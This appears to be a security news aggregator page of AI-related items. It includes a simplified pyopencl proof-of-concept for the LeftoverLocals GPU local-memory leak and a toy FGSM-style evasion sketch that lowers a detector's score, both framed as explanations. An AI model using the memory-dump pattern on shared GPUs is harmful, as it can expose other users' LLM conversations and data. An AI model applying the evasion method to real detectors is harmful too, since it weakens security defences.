Security News

Attackers Could Eavesdrop on AI Conversations on Apple, AMD, Imagination and Qualcomm GPUs
2024-01-18 19:00

Researchers at cybersecurity research and consulting firm Trail of Bits have discovered a vulnerability that could allow attackers to read GPU local memory on affected Apple, Qualcomm, AMD, and Imagination GPUs. In particular, the vulnerability, which the researchers named LeftoverLocals, can expose conversations conducted with large language models and machine learning models running on affected GPUs.
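
The core of the flaw is that GPU local ("workgroup") memory is not cleared between kernel launches, so one kernel can observe data a previous kernel left behind. The sketch below illustrates that pattern: a "writer" kernel plants a canary value in local memory, and a "listener" kernel dumps whatever it finds there without initializing it first. This is a simplified, single-process illustration, not Trail of Bits' actual cross-process proof of concept; the pyopencl setup, kernel names, workgroup sizes, and canary value are assumptions made for demonstration.

```python
# Minimal LeftoverLocals-style sketch (assumes pyopencl and an OpenCL GPU).
import numpy as np
import pyopencl as cl

KERNELS = r"""
__kernel void writer(__local float *scratch) {
    // Plant a recognizable canary in local memory, then exit
    // without clearing it.
    for (uint i = get_local_id(0); i < 1024; i += get_local_size(0))
        scratch[i] = 123.0f;
}
__kernel void listener(__local float *scratch, __global float *out) {
    // Dump whatever is already sitting in local memory WITHOUT
    // writing to it first.
    for (uint i = get_local_id(0); i < 1024; i += get_local_size(0))
        out[i] = scratch[i];
}
"""

ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
prog = cl.Program(ctx, KERNELS).build()

out = np.zeros(1024, dtype=np.float32)
out_buf = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, out.nbytes)
scratch = cl.LocalMemory(1024 * 4)  # 1024 floats of __local scratch

prog.writer(queue, (256,), (256,), scratch)
prog.listener(queue, (256,), (256,), scratch, out_buf)
cl.enqueue_copy(queue, out, out_buf)

# On an affected GPU, the listener recovers the writer's canary.
print("canary values leaked:", int(np.count_nonzero(out == 123.0)), "/ 1024")
```

On an affected GPU the listener can recover the canary; on a patched or unaffected GPU the dump should not contain the writer's data.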

The power of AI in cybersecurity
2024-01-18 04:30

Besides helping security teams perform their tasks more accurately, AI also helps them work faster. Cybercriminals gain the same speed advantage when they harness AI: it allows them to quickly adapt their attacks to new security measures.

Apple, AMD, Qualcomm GPU security hole lets miscreants snoop on AI training and chats
2024-01-17 23:21

Research made public on Tuesday detailed how miscreants can exploit the hole to read data they're not supposed to in a system's local GPU memory. While the flaw potentially affects all GPU applications on vulnerable chips, it is especially concerning for machine-learning workloads: these models push large amounts of data through the GPU, so a correspondingly large amount of potentially sensitive information could be swiped by exploiting this issue.

AMD, Apple, Qualcomm GPUs leak AI data in LeftoverLocals attacks
2024-01-17 15:32

A new vulnerability dubbed 'LeftoverLocals', affecting graphics processing units from AMD, Apple, Qualcomm, and Imagination Technologies, allows attackers to retrieve data from the GPU's local memory space. [...]

This Free Discovery Tool Finds and Mitigates AI-SaaS Risks
2024-01-17 13:30

Wing Security announced today that it now offers free discovery of, and a paid tier for automated control over, thousands of AI and AI-powered SaaS applications. This will allow companies to better...

Code Written with AI Assistants Is Less Secure
2024-01-17 12:14

"At least, that's true today, with today's programmers using today's AI assistants." "Overall, we find that participants who had access to an AI assistant based on OpenAI's codex-davinci-002 model wrote significantly less secure code than those without access."

The Dual Role AI Plays in Cybersecurity: How to Stay Ahead
2024-01-16 15:02

According to a survey, 33 percent of organizations are currently leveraging generative AI in at least one business function. Cybersecurity is also a key area where AI is being used, with 51 percent of business owners planning to enhance their cybersecurity efforts using this technology.

LLM hype fades as enterprises embrace targeted AI models
2024-01-12 04:00

The failure of LLMs to live up to their hype will be the story of 2024, as generic models become relegated to consumer-centric applications and enterprise users turn to smaller, more targeted AI models, purpose-built to meet their business needs. Recognizing the value of the data they hold, companies will seek to secure it by taking a "Hybrid cloud by design" approach, rather than "Hybrid cloud by default." Ultimately, data protection will emerge as a key pillar in a successful AI strategy, and companies will move towards prioritizing AI solutions that are trustworthy and responsible.

Securing AI systems against evasion, poisoning, and abuse
2024-01-09 04:30

The publication, "Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations," is a key component of NIST's broader initiative to foster the creation of reliable AI. The effort supports the implementation of NIST's AI Risk Management Framework and aims to help AI developers and users understand potential attacks and strategies to counter them, acknowledging that there is no silver bullet.

"The risks of AI are as significant as the potential benefits. The latest publication from NIST is a great start to explore and categorize attacks against AI systems. It defines a formal taxonomy and provides a good set of attack classes. It does miss a few areas, such as misuse of the tools to cause harm, abuse of inherited trust by people believing AI is an authority, and the ability to de-identify people and derive sensitive data through aggregated analysis," commented Matthew Rosenquist, CISO at Eclipz.io.
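
Of the attack classes the headline names, evasion is the easiest to make concrete: the attacker perturbs an input at inference time so a trained model misclassifies it. Below is a minimal, self-contained sketch in the spirit of the fast gradient sign method; the NumPy "detector", its weights, and the epsilon value are toy assumptions for illustration, not anything drawn from the NIST publication.

```python
# Toy evasion attack: nudge an input against the gradient of a linear
# logistic "malware detector" so its score drops.
import numpy as np

rng = np.random.default_rng(0)
w = rng.normal(size=16)   # toy detector weights (made up)
b = 0.1
x = rng.normal(size=16)   # an arbitrary input to evade with

def score(x):
    """P(input is malicious) under the toy logistic detector."""
    return 1.0 / (1.0 + np.exp(-(w @ x + b)))

# FGSM-style step: for a linear logit, the sign of the gradient of the
# score w.r.t. the input is simply sign(w), so stepping against it
# decreases the malicious score by eps * sum(|w|) in the logit.
eps = 0.25
x_adv = x - eps * np.sign(w)

print(f"score before: {score(x):.3f}")
print(f"score after : {score(x_adv):.3f}")  # lower => evades the detector
```

Poisoning attacks sit at the other end of the pipeline, corrupting the training data the weights are learned from, which is one reason the taxonomy treats the classes separately.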